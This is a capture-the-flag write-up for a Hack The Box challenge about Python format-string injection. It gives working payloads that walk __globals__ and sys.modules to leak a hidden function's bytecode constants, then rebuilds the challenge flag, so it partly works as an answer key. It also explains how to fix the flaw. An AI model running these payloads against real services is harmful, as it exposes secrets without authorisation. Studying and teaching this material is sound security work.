Vipère
Hack The Box Challenge Writeup
Created by mxrch | Released October 1, 2021 | First Blood: 0xCaue in 1H 16M 15S

Exploit Python format string injection to extract bytecode constants from a hidden function, then reverse a leet speak dictionary to reconstruct the flag.
Review
This one stood out for how naturally the two halves of the challenge fit together. The first half is pure exploitation, creatively navigating Python's internal object model through a format string injection. The second half flips to a reversing mindset, analyzing bytecode and recognizing that the operation direction is inverted. The transition between these two modes is what makes this challenge feel like more than the sum of its parts.
The roughly 20 minutes it took felt about right for medium difficulty. You need basic reversing skills to understand bytecode, combined with creative thinking about how to explore server internals. The challenge name being French for "viper" (snake) is a nice hint toward Python that I appreciated in hindsight.
The tricky part was recognizing the reversing twist. After reconstructing the plaintext from bytecode constants, my first instinct was to submit it directly. Only when it was rejected did I go back and look at the dictionary more carefully, realizing the function shows decoding but the flag needs encoding. That moment of "oh, it is backwards" was genuinely satisfying.
I would recommend this to anyone looking to understand Python internals from a security perspective. The combination of format string injection, object introspection, and bytecode reversing covers a useful range of techniques that come up in real assessments. It teaches through a negative example, showing what breaks when input validation is missing, which sticks better than reading about secure coding in the abstract.
Summary
Vipère is a Python TCP socket server challenge in which user input is used as the template for str.format(), with a whitelisted command dispatcher supplying the arguments. The whitelist covers only top-level command names and does not restrict attribute traversal through Python's object model.
By navigating from the whitelisted whoami function through __globals__ and sys.modules to a hidden database module, we extract the bytecode constants of an unreachable get_credentials() method. Disassembling the bytecode reveals the flag construction logic and a leet speak dictionary.
The critical insight is recognizing the direction of the dictionary operation: the bytecode shows decoding logic (digits to letters), but the flag is stored in encoded format (letters to digits). Reversing the dictionary produces the correct flag.
Key Learning Takeaways
Python Format Strings Are More Dangerous Than They Look
What: Python's str.format() method allows attribute access through dot notation and item access through bracket notation. When user input becomes the format string itself, attackers can walk from any format argument to whatever is reachable from it by chaining __globals__, __class__, and other dunder attributes. Replacement fields can read attributes and items, but they cannot call functions.
Why it matters: This vulnerability class appears in production applications wherever developers use user input as a format template rather than as a format argument. The fix is to never use user input as the string on which .format() is called.
Key pattern: {whoami.__globals__[sys].modules[database]}
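To make the pattern concrete, here is a minimal local sketch of how a replacement field walks attributes and items. The Account class, its fields, and the dispatcher contents are hypothetical stand-ins chosen for illustration; they are not part of the challenge code.

```python
class Account:
    """Hypothetical object handed to str.format() as a keyword argument."""

    def __init__(self, name, settings):
        self.name = name
        self.settings = settings  # data the template author never meant to expose


account = Account("ctf", {"api_key": "not-a-real-key"})
dispatcher = {"whoami": account}

# Intended use: the template reads one harmless attribute.
intended = "Bonjour {whoami.name}".format(**dispatcher)

# Attacker-controlled template: same top-level key, but the field keeps walking.
# Dots perform attribute lookup; brackets perform item lookup with an unquoted key.
injected = "{whoami.settings[api_key]}".format(**dispatcher)

# Replacement fields cannot call anything: "upper()" is treated as an
# attribute name, and no attribute with that name exists.
try:
    "{whoami.name.upper()}".format(**dispatcher)
    call_result = "called"
except AttributeError:
    call_result = "calls are not possible"

print(intended)
print(injected)
print(call_result)
```

The last case is why the rest of this writeup reads data out of objects rather than invoking them.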
Python Code Objects Store Extractable Function Internals
What: Every Python function has a __code__ attribute containing co_consts (literal values), co_code (raw bytecode), co_varnames (local variable names), and co_names (global and attribute names referenced by the bytecode). These can be accessed and extracted even when the function itself cannot be called.
Why it matters: When a function is protected by authentication or connection requirements, its internals are still accessible through the code object. This applies to any Python application where object references are leaked.
Key pattern: func.__code__.co_consts to extract all literal values from a function
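A minimal sketch of what a code object exposes, using a hypothetical local function that only mimics the shape of the real one. The exact contents of co_consts and co_code vary between CPython versions, so the comments describe what to expect rather than exact output.

```python
def get_credentials_stand_in():
    # Hypothetical function; it is never called in this sketch.
    f = 72
    i = 'iss'
    a = 'apts_c'
    return chr(f) + i + a.replace('p', 'n')


code = get_credentials_stand_in.__code__

# None of these lookups execute the function body.
print(code.co_consts)     # includes literals such as 72, 'iss', 'apts_c', 'p', 'n'
print(code.co_varnames)   # local variable names: ('f', 'i', 'a')
print(code.co_names)      # names referenced by the bytecode, including 'chr' and 'replace'
print(len(code.co_code))  # raw bytecode length; the layout is version specific
```

Note that 'replace' shows up in co_names even though it is a method name rather than a global, which matches the ('chr', 'replace') tuple leaked later in the walkthrough.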
Always Consider the Direction of Operations When Reversing
What: The bytecode in this challenge shows a dictionary that decodes leet speak to normal text ({'0': 'o', '1': 'l', '4': 'a'}). The constructed string has no digits because the function was designed to decode credentials. But the flag is stored in encoded (leet speak) format, requiring the dictionary to be reversed.
Why it matters: In any reversing scenario, the code you are reading may show the inverse of what you need to do. Always ask: "Is this code encoding or decoding? Which direction do I need?"
Key pattern: If bytecode shows decode_dict = {'0': 'o'}, the flag needs encode_dict = {'o': '0'}
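Inverting a substitution table is a one-liner as long as the mapping is one-to-one. The sketch below uses the decode direction described above and a neutral sample string (not the flag); the helper name apply_mapping is an assumption made for this example.

```python
decode_map = {'0': 'o', '1': 'l', '4': 'a'}  # direction described in this writeup
encode_map = {plain: leet for leet, plain in decode_map.items()}


def apply_mapping(mapping, text):
    """Replace every single-character key of `mapping` in `text` with its value."""
    return text.translate(str.maketrans(mapping))


sample = "hello alpaca"  # neutral sample text, not the flag
encoded = apply_mapping(encode_map, sample)
decoded = apply_mapping(decode_map, encoded)

print(encoded)  # he110 41p4c4
print(decoded)  # hello alpaca
```

Using str.translate applies all substitutions in a single pass, which avoids the ordering problems that chained replace() calls can run into when keys and values overlap.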
Walkthrough
Source Code Review
The challenge provides main.py, the source code of the Python socket server. We start by examining the key components to understand the attack surface.
$ cat main.py
import sys
import os
import subprocess
import socketserver
from datetime import datetime
from string import Formatter
class Station(socketserver.BaseRequestHandler):
    # ... handle method accepts user input as format strings
    def handle(interface):
        # ...
        while True:
            interface.print('Which function do you want to launch ?\n...\n=> ')
            text = interface.get_input()
            requested_commands = [fname for _, fname, _, _ in Formatter().parse(text) if fname]
            secure_commands = SecureCommands(requested_commands)
            try:
                interface.print(text.format(**secure_commands.dispatcher))
            except KeyError:
                interface.print("You tried to hack us, huh ?!")

class SecureCommands():
    def __init__(self, requested_commands):
        self.dispatcher = {
            "whoami": self.whoami,
            "get_time": self.get_time,
            "get_version": self.get_version
        }
    # ...
    def get_infected(self):
        bridge = server.bridge
        bridge.db.connect()
        return bridge.db.total_infected

class SecureBridge():
    def __init__(self):
        import database
        self.db = database.SecureDatabase()

class ServerContext(socketserver.ThreadingTCPServer):
    def __init__(self, server_address, RequestHandlerClass):
        self.bridge = SecureBridge()
        # ...
Several things stand out from reading the source:
- User input is passed directly to text.format(**secure_commands.dispatcher), making this a format string injection vulnerability
- Only three commands are in the dispatcher whitelist: whoami, get_time, get_version
- A hidden get_infected() method references server.bridge.db, revealing a SecureDatabase class in a database module
- The ServerContext class stores a SecureBridge as self.bridge, which holds a database.SecureDatabase() instance
Format String Injection
The core vulnerability is the call text.format(**secure_commands.dispatcher) in handle(). The whitelist checks command names but does not prevent attribute traversal. Python's format string syntax allows {whoami.__globals__} to access the function's global namespace, bypassing the intended restrictions entirely.
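To see what a name-based check has to work with, the sketch below runs the same Formatter().parse() call used in main.py on a benign and a hostile template. The body of SecureCommands is elided in the source, so is_plain_whitelisted is a hypothetical stricter check written for illustration, not the challenge's actual validation.

```python
from string import Formatter

ALLOWED = {"whoami", "get_time", "get_version"}


def field_names(template):
    """Return every replacement-field name found in `template`."""
    return [name for _, name, _, _ in Formatter().parse(template) if name]


def is_plain_whitelisted(template):
    """Hypothetical check: accept only bare whitelisted names, no spec or conversion."""
    for _, name, spec, conversion in Formatter().parse(template):
        if name is None:
            continue  # segment with literal text only
        if name not in ALLOWED or spec or conversion:
            return False
    return True


benign = "Bonjour {whoami}, il est actuellement {get_time} !"
hostile = "{whoami.__globals__[server]}"

print(field_names(benign))   # ['whoami', 'get_time']
print(field_names(hostile))  # ['whoami.__globals__[server]']
print(is_plain_whitelisted(benign), is_plain_whitelisted(hostile))  # True False
```

The parser hands back the full field name, traversal path included, so a check that only looks at the leading identifier lets the rest of the path through. Rejecting non-empty format specs also matters, because a spec may itself contain nested replacement fields.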
Format String Injection Test
We connect to the remote service and verify the basic format string functionality works as described in the source code.
$ python3 -c "
from pwn import *
p = remote('TARGET_IP', TARGET_PORT)
data = p.recv(timeout=3)
print(data.decode())
p.close()
"
[+] Opening connection to TARGET_IP on port TARGET_PORT: Done
Welcome in the HideAndSec secret VPS ! [Location : Paris, France]
[+] Vipère v1.26 loaded !
~ Currently loaded functions : [whoami, get_time, get_version]
Which function do you want to launch ?
Example : Bonjour {whoami}, il est actuellement {get_time} !
=>
[*] Closed connection to TARGET_IP port TARGET_PORT
The banner confirms this is the Vipère service running Python 3.8. We test the format string by calling the whitelisted whoami function.
=> Bonjour {whoami}, il est actuellement {get_time} !
Bonjour ctf, il est actuellement 2026-02-20 17:40:32 !
Format string injection confirmed. The dispatcher resolves {whoami} to the return value of the whoami() method (which runs subprocess.check_output("whoami")) and {get_time} to the current timestamp.
Object Traversal
Since Python's format string syntax supports attribute access through dot notation, we can traverse the object hierarchy starting from any whitelisted function. The __globals__ attribute of a function gives access to the module's global namespace.
=> {whoami.__globals__[server]}
<__main__.ServerContext object at 0x7f5e47452940>
We can reach the server global variable through whoami's globals. From here we navigate to the database object following the path we identified in the source code.
=> {whoami.__globals__[server].bridge.db}
<database.SecureDatabase object at 0x7f5e47116a00>
=> {whoami.__globals__[server].bridge.db.get_credentials}
<bound method SecureDatabase.get_credentials of <database.SecureDatabase object at 0x7f5e47116a00>>
We can see the get_credentials method, but we cannot run it: replacement fields can only read attributes and items, never call anything, and the method would presumably require self.connect() to succeed first (as the get_infected method suggests). Instead of trying to call it, we extract its internals through Python's code object interface.
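The traversal can be reproduced offline with a small stand-in. Everything in the sketch below is hypothetical scaffolding: fake_main imitates only the attribute chain from main.py, and a plain function is placed in the dispatcher for brevity where the real one holds bound methods.

```python
import types

# Hypothetical stand-in for main.py: only the attribute chain matters here.
SERVER_SOURCE = '''
class SecureDatabase:
    def get_credentials(self):
        return "never called in this sketch"

class SecureBridge:
    def __init__(self):
        self.db = SecureDatabase()

class ServerContext:
    def __init__(self):
        self.bridge = SecureBridge()

def whoami():
    return "ctf"

server = ServerContext()
'''

# Run the stand-in inside its own module namespace so that
# whoami.__globals__ is exactly that namespace.
fake_main = types.ModuleType("fake_main")
exec(SERVER_SOURCE, fake_main.__dict__)

dispatcher = {"whoami": fake_main.whoami}

# [server] indexes the module globals; the dots then follow instance attributes.
payload = "{whoami.__globals__[server].bridge.db.get_credentials}"
leaked = payload.format(**dispatcher)

print(leaked)  # repr of the bound method; the method itself is never invoked
```

The only thing the attacker needs is one object in the format arguments that carries a reference back to the module namespace.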
Bytecode Extraction
Every Python function stores its compiled bytecode and associated data in a __code__ object. We can access this through the format string to extract the function's constants, variable names, and raw bytecode without ever calling it.
We use sys.modules to access the database module directly, which lets us reach the class definition rather than just the instance method.
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_consts}
(None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss', 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
Code Object Constants
Python's co_consts contains every literal value used in the function: strings, numbers, tuples, and None. These are the raw building blocks of whatever the function constructs. We can see fragments that look like parts of a flag: 'BT', 'orc', 'iss', numbers like 72 (ASCII for H) and 123 (ASCII for {).
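Because the service returns the tuple as text, it helps to turn it back into a real Python object before working with it. The sketch below parses the output shown above with ast.literal_eval and flags integers that fall in the printable ASCII range; the range check is a heuristic assumed for this example, not something the challenge dictates.

```python
import ast

# Text exactly as printed by the service for co_consts.
leaked = ("(None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss', "
          "123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))")

consts = ast.literal_eval(leaked)  # accepts Python literals only, unlike eval()

# Integers in the printable ASCII range are likely character codes.
as_chars = {n: chr(n) for n in consts if isinstance(n, int) and 32 <= n < 127}

print(len(consts))  # 19
print(as_chars)     # {72: 'H', 109: 'm', 123: '{', 125: '}'}
```

The remaining integers, -1 and 4, are not character codes; they serve as a slice step and a repeat count in the reconstruction further down.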
We also extract the local variable names (co_varnames), the referenced names (co_names), and the raw bytecode for disassembly.
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_varnames}
('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_names}
('chr', 'replace')
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_code}
b'd\x01}\x01d\x02}\x02d\x03d\x00d\x00d\x04\x85\x03\x19\x00}\x03d\x05d\x00d\x00d\x04\x85\x03\x19\x00}\x04d\x06}\x05d\x07}\x06d\x08}\x07t\x00|\x01\x83\x01...'
Bytecode Analysis and Disassembly
With the raw bytecode, constants, variable names, and global names, we can reconstruct a code object and disassemble it using Python's dis module. This reveals the complete function logic.
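A minimal sketch of the mechanics, run against a hypothetical local function rather than the real leak (the co_code shown above is truncated, so it cannot be parsed as-is). It simulates the service printing a bytes literal, converts that text back to bytes, and lists the opcode names.

```python
import ast
import dis


def stand_in():
    # Hypothetical function standing in for get_credentials().
    blue = 'BT'[::-1]
    return chr(72) + blue


# The service prints co_code as a bytes literal; simulate that leak locally.
leaked_text = repr(stand_in.__code__.co_code)

raw = ast.literal_eval(leaked_text)  # text -> bytes without using eval()
assert raw == stand_in.__code__.co_code

# Opcode numbering changes between CPython releases, so a real leak should be
# disassembled with the same minor version that produced it.
opnames = [ins.opname for ins in dis.get_instructions(stand_in)]
print(opnames)
```

For a real leak there is no function object to hand to dis, which is why the writeup rebuilds a code object from the extracted pieces first. Disassembling raw bytes under a different interpreter version will decode without errors but produce misleading instructions.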
$ python3
>>> import dis, types, ast
# Constants extracted from the remote service
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
... 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
>>> varnames = ('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
>>> names = ('chr', 'replace')
# Reconstruct and disassemble the function logic
# From the bytecode instructions, the function does:
f = 72 # ASCII 'H'
a = 'apts_c'
blue = 'BT'[::-1] # Reverse -> 'TB'
c = 'orc'[::-1] # Reverse -> 'cro'
m = 109 # ASCII 'm'
h = 'ocoh'
i = 'iss'
# String construction:
f = chr(72) + 'TB' + chr(123) + 'cro' + 'iss' + 'apts_c'.replace('p','n') + 'ocoh'[::-1] + '_h' + chr(109)*4 + chr(125)
# = 'H' + 'TB' + '{' + 'cro' + 'iss' + 'ants_c' + 'hoco' + '_h' + 'mmmm' + '}'
# = 'H' + 'TB' + '{' + 'croissants' + '_choco_hmmmm' + '}'
# Then a dictionary replacement loop:
d = {'0': 'o', '1': 'l', '4': 'a'}
for x in d:
    f = f.replace(x, d[x])
The disassembly reveals the function constructs a plaintext string from scattered constants (the decoded form of the credentials), then applies a dictionary that replaces digits with letters. But wait: the constructed string has no digits in it. This dictionary replacement would have no effect on the constructed string. Something is backwards.
The Reversing Twist
The Dictionary Goes the Wrong Way
The bytecode dictionary {'0': 'o', '1': 'l', '4': 'a'} replaces digits with letters. This is a decoding dictionary that converts leet speak back to normal text. But the constructed string already IS normal text with no digits in it. The dictionary replacement does nothing to it.
This means the function is designed to decode credentials from their stored (leet speak) format. The flag must be stored in encoded form. We need to reverse the dictionary: replace letters with digits instead of digits with letters.
The logic chain: the function constructs the plaintext version of the credentials, then has a decode step. In the real system, credentials are stored encoded (leet speak). The get_credentials function would decode them for display. We have the plaintext output of the construction, so we need to encode it to get the stored flag value.
| Bytecode Dictionary (Decode) | Reversed Dictionary (Encode) |
|---|---|
| '0' -> 'o' | 'o' -> '0' |
| '1' -> 'l' | 'l' -> '1' |
| '4' -> 'a' | 'a' -> '4' |
One caveat on direction: in CPython 3.8 a dictionary literal with constant keys is built by BUILD_CONST_KEY_MAP, which takes the tuple on top of the stack as the keys and the items pushed before it as the values. The constants '0', '1', '4' followed by ('o', 'l', 'a') are therefore also consistent with a literal {'o': '0', 'l': '1', 'a': '4'}, in which case the function performs the encoding itself. The truncated co_code shown earlier is not enough to settle this, so it is worth checking the BUILD_CONST_KEY_MAP operands in the full disassembly. Either reading produces the same flag.
Flag Reconstruction
We put it all together: reconstruct the plaintext from the constants, then apply the reversed (encoding) dictionary to produce the flag.
$ python3
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
... 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
# Build the plaintext string from constants
>>> f = consts[1]; a = consts[2]; blue = consts[3][::-1]
>>> c = consts[5][::-1]; m = consts[6]; h = consts[7]; i = consts[8]
>>> plaintext = (chr(f) + blue + chr(consts[9]) + c + i +
... a.replace(consts[10], consts[11]) + h[::-1] +
... consts[12] + chr(m) * consts[13] + chr(consts[14]))
>>> print(f'Plaintext: {plaintext}')
Plaintext: [decoded credential string constructed from constants]
# Reverse the dictionary: encode instead of decode
>>> encode_dict = {
...     consts[18][0]: consts[15],  # 'o' -> '0'
...     consts[18][1]: consts[16],  # 'l' -> '1'
...     consts[18][2]: consts[17],  # 'a' -> '4'
... }
>>> flag = plaintext
>>> for char, digit in encode_dict.items():
...     flag = flag.replace(char, digit)
...
>>> print(f'Flag: {flag}')
Flag: [flag content retrieved]
The decoded plaintext becomes the leet speak encoded flag after applying the reversed dictionary: o -> 0 and a -> 4 transform the relevant characters.
Verification Check
We can verify the flag makes sense: "croissants" and "choco" are French food references (matching the Paris, France location in the banner), and the leet speak encoding is consistent with the dictionary found in the bytecode. The l -> 1 mapping has no effect here because the plaintext contains no l characters.
Mitigation: Never Use User Input as Format Strings
The root cause of this vulnerability is passing user-controlled input directly to str.format(). The fix is straightforward: use user input only as format arguments, never as the format template itself. For example, "Hello {name}".format(name=user_input) is safe, but user_input.format(**kwargs) is not. Template engines like Jinja2 with auto-escaping and sandboxing provide safer alternatives for dynamic content generation.
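The difference between the two usages can be sketched in a few lines. The values dictionary and the sample timestamp are assumptions for illustration. string.Template is shown as one standard-library option for cases where users really must supply their own templates, since it substitutes plain identifiers only.

```python
from string import Template

user_input = "{whoami.__globals__}"  # hostile text from the client

# Safe: the template is a constant; user text is only ever an argument,
# and braces inside an argument are not parsed again.
greeting = "Bonjour {name} !".format(name=user_input)

# User-supplied template, rendered with string.Template: "$whoami" is
# substituted, and the trailing ".__globals__" stays literal text.
values = {"whoami": "ctf", "get_time": "17:40:32"}
user_template = "Bonjour $whoami.__globals__, il est $get_time"
rendered = Template(user_template).safe_substitute(values)

print(greeting)  # Bonjour {whoami.__globals__} !
print(rendered)  # Bonjour ctf.__globals__, il est 17:40:32
```

In both cases the traversal path ends up as inert text in the output instead of being evaluated against live objects.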
Solving Chain
The logical progression from initial reconnaissance to flag capture, showing how each step builds on the previous one.
Step 1
Reconnaissance: Source Code Review
Examined the provided main.py to identify the application architecture, input handling, and command dispatch mechanism. Identified the format string sink where user input flows directly into str.format().
Step 2
Vulnerability Confirmation: Format String Injection
Connected to the remote service and confirmed that format string placeholders like {whoami} resolve through the dispatcher. Verified that attribute traversal (__globals__) is not blocked by the whitelist, confirming the injection vector.
Step 3
Privilege Escalation: Object Traversal to Hidden Module
Navigated from the whitelisted whoami function through __globals__[server].bridge.db to reach the SecureDatabase instance and its get_credentials method, which is not exposed through the dispatcher.
Step 4
Data Extraction: Bytecode Constants via Code Objects
Accessed get_credentials.__code__.co_consts, co_varnames, co_names, and co_code through the format string to extract all function internals without calling the function itself.
Step 5
Analysis: Bytecode Disassembly and Logic Reconstruction
Reconstructed a Python code object from the extracted components and disassembled it using the dis module. Mapped the bytecode instructions to the string construction logic and identified the leet speak dictionary.
Step 6
Key Insight: Operation Direction Reversal
Recognized that the bytecode dictionary decodes leet speak to plaintext, but the flag is stored in encoded (leet speak) format. The dictionary must be reversed: instead of {'0': 'o'}, we need {'o': '0'}.
Step 7
Flag Capture: Plaintext Encoding
Applied the reversed encoding dictionary to the reconstructed plaintext string, transforming o -> 0 and a -> 4 to produce the final leet speak encoded flag.
Additional Resources
Exact References Used
| Technique | Resource |
|---|---|
| Python Format String Syntax | Python Docs: Format String Syntax |
| Python Bytecode Disassembly | Python Docs: dis module |
| Python Code Objects | Python Docs: Code Objects |
| Server-Side Template Injection | PortSwigger: Server-Side Template Injection |
Framework References
| ID | Description |
|---|---|
| CWE-134 | Use of Externally-Controlled Format String |
| ATT&CK T1059.006 | Command and Scripting Interpreter: Python |
Further Reading
| Topic | Resource |
|---|---|
| Python Object Introspection Attacks | HackTricks: Python Sandbox Bypass |
| Python Data Model | Python Docs: Data Model |
| Format String Exploitation Patterns | Podalirius: Python Format String Vulnerabilities |